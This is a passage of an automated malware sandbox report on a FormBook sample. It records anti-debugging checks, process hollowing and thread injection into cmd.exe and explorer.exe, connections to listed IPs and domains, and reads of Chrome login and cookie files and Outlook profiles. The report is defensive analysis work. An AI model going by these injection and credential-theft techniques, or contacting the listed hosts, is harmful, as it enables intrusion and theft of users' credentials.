          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A75BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A6131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00A78F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_009BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040CF93 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_004018B6 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_0040632B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00401BB3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 85.187.128.34 80
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.33.30.197 80
          Source: C:\Windows\explorer.exeDomain query: www.un-object.com
          Source: C:\Windows\explorer.exeDomain query: www.energyservicestation.com
          Source: C:\Windows\explorer.exeNetwork Connect: 78.141.192.145 80
          Source: C:\Windows\explorer.exeDomain query: www.white-hat.uk
          Source: C:\Windows\explorer.exeDomain query: www.thewildphotographer.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.shapshit.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.198 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.17.12 80
          Source: C:\Windows\explorer.exeDomain query: www.thedivinerudraksha.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.147 80
          Source: C:\Windows\explorer.exeDomain query: www.bitservicesltd.com
          Source: C:\Windows\explorer.exeDomain query: www.younrock.com
          Source: C:\Windows\explorer.exeDomain query: www.gritslab.com
          Source: C:\Windows\explorer.exeNetwork Connect: 161.97.163.8 80
          Source: C:\Windows\explorer.exeDomain query: www.222ambking.org
          Source: C:\Windows\explorer.exeDomain query: www.fclaimrewardccpointq.shop
          Source: C:\Windows\explorer.exeNetwork Connect: 94.176.104.86 80
          Source: C:\Windows\explorer.exeNetwork Connect: 213.145.228.111 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: D90000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeThread register set: target process: 3528
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3528
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeProcess created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
          Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000004.00000000.327263504.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.574282998.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.446841530.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.318203390.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.567226844.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_004019C5 cpuid
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_0040163B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
